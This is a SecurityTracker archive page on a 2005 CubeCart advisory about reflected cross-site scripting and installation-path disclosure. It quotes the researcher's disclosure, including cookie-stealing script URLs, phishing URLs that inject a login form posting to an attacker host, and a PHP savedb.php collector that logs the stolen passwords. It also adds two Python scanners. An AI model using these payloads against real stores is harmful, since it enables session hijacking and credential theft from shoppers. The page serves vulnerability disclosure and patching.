SecurityTracker.com
SecurityTracker Archives

Category:   Application (Commerce)  >  CubeCart (formerly eStore)
Vendors:   brooky.com
CubeCart Input Validation Holes Permit Cross-Site Scripting Attacks and Disclose the Installation Path to Remote Users
SecurityTracker Alert ID:  1013304
SecurityTracker URL:  http://securitytracker.com/id/1013304
CVE Reference:   GENERIC-MAP-NOMATCH
Date:  Feb 25 2005
Impact:   Disclosure of authentication information, Disclosure of system information, Disclosure of user information, Execution of arbitrary code via network, Modification of user information
Vendor Confirmed:  Yes  Exploit Included:  Yes  
Version(s): 2.0 - 2.0.5
Description:   Lostmon reported two classes of vulnerability in CubeCart. A remote user can determine the installation path, and a remote user can conduct cross-site scripting attacks against other users of the store.

The 'admin/Settings.inc.php' script does not properly validate user-supplied input in the cat_id, PHPSESSID, view_doc, product, session, catname, search, and page parameters. This script is included by various other scripts, so the flaw is reachable through each of them, including:

forgot_pass.php
index.php
login.php
logout.php
new_pass.php
register.php
sale_cat.php
search.php
tellafriend.php
view_doc.php
view_order.php
view_product.php
your_links.php
your_orders.php

A remote user can create a specially crafted URL that, when loaded by a target user, will cause arbitrary scripting code to be executed by the target user's browser. The code will originate from the site running the CubeCart software and will run in the security context of that site. As a result, the code will be able to access the target user's cookies (including authentication cookies), if any, associated with the site, access data recently submitted by the target user via web form to the site, or take actions on the site acting as the target user.
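
The attribute-breakout reflection described above can be verified without a browser. The following Python script is an added example, not code from the advisory, from Lostmon or from CubeCart: it sends the advisory's `">`-prefixed payload, with a uniquely marked dummy tag in place of alert(document.cookie), to each of the scripts and parameters listed, and tells a raw reflection (exploitable) apart from an HTML-escaped one (what a fixed build returns) or no reflection at all. The store URL, the fake_cubecart responder and its per-script behaviour are constructed for the demonstration; like the PoCs, it assumes the value lands inside a double-quoted HTML attribute.

```python
"""Probe the CubeCart scripts/parameters named in the advisory for reflected XSS.

The payload reuses the advisory's attribute-breakout prefix ("><) but injects
a uniquely marked dummy tag instead of alert(document.cookie), so the verdict
can be read from the response body without a browser.
"""
import html
import secrets
import urllib.parse
import urllib.request

# Scripts and parameters listed in the advisory (all include admin/Settings.inc.php).
SCRIPTS = [
    "forgot_pass.php", "index.php", "login.php", "logout.php", "new_pass.php",
    "register.php", "sale_cat.php", "search.php", "tellafriend.php", "view_doc.php",
    "view_order.php", "view_product.php", "your_links.php", "your_orders.php",
]
PARAMS = ["cat_id", "PHPSESSID", "view_doc", "product", "session", "catname", "search", "page"]


def make_marker() -> str:
    """Random per-request token so a reflection cannot be confused with page content."""
    return "m" + secrets.token_hex(4)


def make_payload(marker: str) -> str:
    # Same breakout as the PoCs: close the attribute value and the tag, then open a new one.
    return f'"><xss{marker}>'


def build_url(base: str, script: str, param: str, payload: str) -> str:
    # urlencode produces the %22%3E%3C form seen in the advisory's encoded PoC URLs.
    return f"{base.rstrip('/')}/{script}?{urllib.parse.urlencode({param: payload})}"


def classify(body: str, marker: str) -> str:
    """vulnerable: '"' and '<' echoed raw, so the injected tag is live.
    encoded:    the value is echoed but the metacharacters were escaped or stripped.
    absent:     the parameter is not reflected on this page at all."""
    if make_payload(marker) in body:
        return "vulnerable"
    if marker in body:
        return "encoded"
    return "absent"


def http_fetch(url: str, timeout: float = 10.0) -> str:
    """Plain GET; only used when probing a real host."""
    with urllib.request.urlopen(url, timeout=timeout) as resp:
        return resp.read().decode("utf-8", "replace")


def probe_site(base, fetch=http_fetch, scripts=SCRIPTS, params=PARAMS):
    """Return {(script, param): verdict} for every reflected (non-absent) combination."""
    findings = {}
    for script in scripts:
        for param in params:
            marker = make_marker()
            body = fetch(build_url(base, script, param, make_payload(marker)))
            verdict = classify(body, marker)
            if verdict != "absent":
                findings[(script, param)] = verdict
    return findings


def fake_cubecart(url: str) -> str:
    """Constructed stand-in for a store (no real responses were captured):
    index.php echoes every parameter raw into a hidden field, search.php
    applies the htmlspecialchars-style escaping a fixed build would, and
    login.php does not echo the parameter at all."""
    parts = urllib.parse.urlsplit(url)
    script = parts.path.rsplit("/", 1)[-1]
    fields = []
    for name, values in urllib.parse.parse_qs(parts.query).items():
        if script == "login.php":
            continue
        value = values[0]
        if script == "search.php":
            value = html.escape(value, quote=True)   # "><  becomes  &quot;&gt;&lt;
        fields.append(f'<input type="hidden" name="{name}" value="{value}">')
    return "<html><body><form>" + "".join(fields) + "</form></body></html>"


if __name__ == "__main__":
    results = probe_site("http://shop.example/store", fetch=fake_cubecart,
                         scripts=["index.php", "search.php", "login.php"])
    for (script, param), verdict in sorted(results.items()):
        print(f"{script:<12} {param:<10} {verdict}")
```

Against a real store, call probe_site with the store's base URL and the default http_fetch; a "vulnerable" verdict means the double quote and angle bracket came back unescaped, which is exactly the condition the advisory's alert(document.cookie) URLs rely on.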

A remote user can directly request the following scripts to cause the system to display the installation path:

information.php
language.php
list_docs.php
popular_prod.php
sale.php
subfooter.inc.php
subheader.inc.php
cat_navi.php

A demonstration exploit URL is provided:

http://[Target]/path_to_store/cat_navi.php
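
Requesting the include files listed above directly can be checked the same way. The following Python script is an added example, not code from the advisory or from the vendor: it fetches each file and parses any PHP error text in the response ("... in /path/to/file.php on line N", with or without the <b> tags PHP emits when html_errors is on) for the absolute script path, from which the installation directory follows. The sample error messages, hostnames and paths are constructed, not captured from a real store; the real fetch uses only urllib.

```python
"""Check the include files named in the advisory for installation-path disclosure.

Each file is requested directly, outside the page that normally includes it,
and any PHP error text in the response is parsed for the absolute path of the
script, from which the store's installation directory follows.
"""
import ntpath
import posixpath
import re
import urllib.request

# Files the advisory says disclose the path when requested directly.
INCLUDE_FILES = [
    "information.php", "language.php", "list_docs.php", "popular_prod.php",
    "sale.php", "subfooter.inc.php", "subheader.inc.php", "cat_navi.php",
]

# "... in /abs/path/file.php on line N", with or without the <b> tags PHP adds
# when html_errors is on; also accepts Windows drive-letter paths.
PHP_ERROR_RE = re.compile(
    r"\bin\s+(?:<b>)?"
    r"((?:/|[A-Za-z]:\\)[^<>\r\n]*?\.php)"
    r"(?:</b>)?\s+on\s+line\s+(?:<b>)?(\d+)",
    re.IGNORECASE,
)


def extract_paths(body: str) -> list[tuple[str, int]]:
    """Every (absolute script path, line number) leaked by a PHP error in the body."""
    return [(m.group(1), int(m.group(2))) for m in PHP_ERROR_RE.finditer(body)]


def install_dir(script_path: str) -> str:
    """Directory part of a leaked path, using the separator rules the path itself uses."""
    mod = ntpath if "\\" in script_path else posixpath
    return mod.dirname(script_path)


def http_fetch(url: str, timeout: float = 10.0) -> str:
    """Plain GET; only used when probing a real host."""
    with urllib.request.urlopen(url, timeout=timeout) as resp:
        return resp.read().decode("utf-8", "replace")


def check_path_disclosure(base, fetch=http_fetch, files=INCLUDE_FILES):
    """Return {file: [(path, line), ...]} for each file whose direct request leaks a path."""
    leaks = {}
    for name in files:
        paths = extract_paths(fetch(f"{base.rstrip('/')}/{name}"))
        if paths:
            leaks[name] = paths
    return leaks


def leaked_roots(leaks) -> set[str]:
    """Distinct installation directories implied by all leaked paths."""
    return {install_dir(path) for paths in leaks.values() for path, _ in paths}


# Constructed responses (not captured from a real store): PHP 4 html_errors
# output on a Unix host, and plain-text errors on a Windows host.
SAMPLE_UNIX = (
    "<br />\n<b>Warning</b>:  main(admin/Settings.inc.php): failed to open stream: "
    "No such file or directory in <b>/home/store/public_html/shop/cat_navi.php</b> "
    "on line <b>4</b><br />\n"
    "<br />\n<b>Notice</b>:  Undefined variable:  config in "
    "<b>/home/store/public_html/shop/cat_navi.php</b> on line <b>9</b><br />\n"
)
SAMPLE_WINDOWS = (
    r"Warning: main(admin/Settings.inc.php): failed to open stream: "
    r"No such file or directory in C:\Inetpub\wwwroot\store\sale.php on line 3"
)


def fake_store(url: str) -> str:
    """Stand-in fetch: two include files error out, everything else renders normally."""
    name = url.rsplit("/", 1)[-1]
    if name == "cat_navi.php":
        return SAMPLE_UNIX
    if name == "sale.php":
        return SAMPLE_WINDOWS
    return "<html><body>Welcome to the store</body></html>"


if __name__ == "__main__":
    leaks = check_path_disclosure("http://shop.example/store", fetch=fake_store)
    for name, paths in leaks.items():
        print(name, "->", paths)
    print("installation directories:", sorted(leaked_roots(leaks)))
```

The regex deliberately requires an absolute path (a leading slash or drive letter) after "in", so relative names inside the message such as main(admin/Settings.inc.php) are not mistaken for the disclosed location.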

The vendor was notified on February 15, 2005.

The original advisory is available at:

http://lostmon.blogspot.com/2005/02/cubecart-20x-multiple-variable-xss.html

Lostmon discovered this vulnerability.

Impact:   A remote user can access the target user's cookies (including authentication cookies), if any, associated with the site running the CubeCart software, access data recently submitted by the target user via web form to the site, or take actions on the site acting as the target user.

A remote user can determine the installation path.

Solution:   The vendor has issued a fixed version (2.0.6) to correct the path disclosure flaws but not the cross-site scripting flaws, available at:

http://www.cubecart.com/site/downloads/

The vendor has also described how to manually apply the fix to version 2.0.5:

http://www.cubecart.com/site/forums/index.php?showtopic=6032

Vendor URL:  www.cubecart.com/site/home/
Cause:   Input validation error
Underlying OS:  Linux (Any), UNIX (Any), Windows (Any)

Message History:   None.


 Source Message Contents

Subject:  CubeCart 2.0.x multiple variable XSS attacks and path disclosure


#################################################################
CubeCart 2.0.x multiple variable XSS attacks and path disclosure
vendor: Devellion Limited
vendor url: http://www.cubecart.com
vendor confirmed: yes    exploit available: yes
advisory: http://lostmon.blogspot.com/2005/02/cubecart-20x-multiple-variable-xss.html
vendor-specific solution: http://www.cubecart.com/site/forums/index.php?showtopic=6032
#################################################################


CubeCart contains a flaw that allows a remote cross-site scripting attack.
This flaw exists because the application does not validate some variables
upon submission to some scripts. This could allow a user to create a specially
crafted URL that would execute arbitrary code in a user's browser within the
trust relationship between the browser and the server, leading to a
loss of integrity.

The admin/Settings.inc.php script is included in all of these files, and it is
this one that fails to validate code sent to the other files through the
variables.

##################
variables affected:
##################

cat_id
PHPSESSID
view_doc
product
session
catname
search
page

###########################
possible XSS-affected files:
###########################

forgot_pass.php 
index.php 
login.php 
logout.php 
new_pass.php 
register.php 
sale_cat.php 
search.php 
tellafriend.php 
view_doc.php 
view_order.php 
view_product.php 
your_links.php  
your_orders.php 



##############################
path disclosure files affected:
##############################

PoC = http://[Target]/path_to_store/cat_navi.php

information.php
language.php 
list_docs.php 
popular_prod.php 
sale.php
subfooter.inc.php 
subheader.inc.php 
cat_navi.php

###################
versions affected:
###################

2.0.0
2.0.1
2.0.2
2.0.3
2.0.5
2.0.6 fixed path disclosure :)


#####################################################
Some proofs of concept, but there are moooore !!!! :/
#####################################################

http://[Target]/path_to_store/?"><script>alert(document.cookie);</script>
http://[Target]/path_to_store/view_order.php?cat_id=1"><script>alert(document.cookie);</script>
http://[Target]/path_to_store/forgot_pass.php?catname='pruebas1'"><script>alert(document.cookie);</script>
http://[Target]/path_to_store/index.php?cat_id=5"><body><p><h1>CubeCart XSS Pow@ !!!</h1></p>/<body>
http://[Target]/path_to_store/view_order.php?session=1"><script>alert(document.cookie);</script>
http://[Target]/path_to_store/view_order.php?product=1"><script>alert(document.cookie);</script>
http://[Target]/path_to_store/your_orders.php?cat_id="><script>document.write(document.cookie)</script>
http://[Target]/path_to_store/view_product.php?product=1"><script>alert(document.cookie);</script>
http://[Target]/path_to_store/tellafriend.php?product=1&session="><script>alert(document.cookie)</script>
http://[Target]/path_to_store/tellafriend.php?product=1"><script>document.write(document.cookie)</script>
http://[Target]/path_to_store/login.php?session="><script>alert(document.cookie);</script>


http://[Target]/path_to_store/search.php?search=%22%3E%3Cform%20action=http://[Attacker]/savedb.php%20method=post%3EUsername:%3Cinput%20name=username%20type=text%20maxlength=30%3EPassword:%3Cinput%20name=password%20type=text%20maxlength=30%3E%3Cinput%20name=Login%20type=submit%20value=Login%3E%3C/form>

http://[Target]/path_to_store/tellafriend.php?product=1%22%3E%3Cform%20action=http://[Attacker]/savedb.php%20method=post%3EUsername:%3Cinput%20name=username%20type=text%20maxlength=30%3EPassword:%3Cinput%20name=password%20type=text%20maxlength=30%3E%3Cinput%20name=Login%20type=submit%20value=Login%3E%3C/form%3E

so many files and variables are affected :(


###########################
proof of concept savedb.php
###########################


<?php
// Receives the POST from the login form injected by the XSS URLs above and
// appends the captured credentials to a text file. The original relied on
// register_globals for $username/$password; they are read from $_POST here.
$username = isset($_POST['username']) ? $_POST['username'] : '';
$password = isset($_POST['password']) ? $_POST['password'] : '';
$lala = fopen("tostada.txt", "a+");
fwrite($lala, "username:" . $username . "|" . "Password:" . $password . "|\n");
fclose($lala);
// Send the victim on to the real login page so nothing looks wrong.
header("Location: http://[target]/path_to_store/login.php");
exit();
?>

#############################



Change the variable for another vulnerable one, or for another file & variable;
so many are vulnerable :P

solution:

  1  - upgrade to version 2.0.6

  1.1- to fix the path disclosure issue, the vendor released a fix on 2005-02-21.
       CubeCart 2.0.6 is not affected; upgrade your store or apply the fix.

  1.2- to fix most XSS flaws you need to update your store and wait for
       all the changes, or until the vendor releases a new version.


#################
release time :
#################


discovered:            2005-02-15
vendor notified:       2005-02-15
vendor response:       2005-02-15
path disclosure fix:   2005-02-21
XSS fix:               2005-02-25
disclosure date:       2005-02-25



Sincerely,

Lostmon (lostmon@gmail.com)

Thanks to estrella for being my light
Thanks to www.hispanew.com for support
Thanks to the CubeCart team, good response & good work !!
Thanks to http://www.osvdb.org

-- 
Sincerely:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/

Curiosity is what keeps the mind moving....
Copyright 2019, SecurityGlobal.net LLC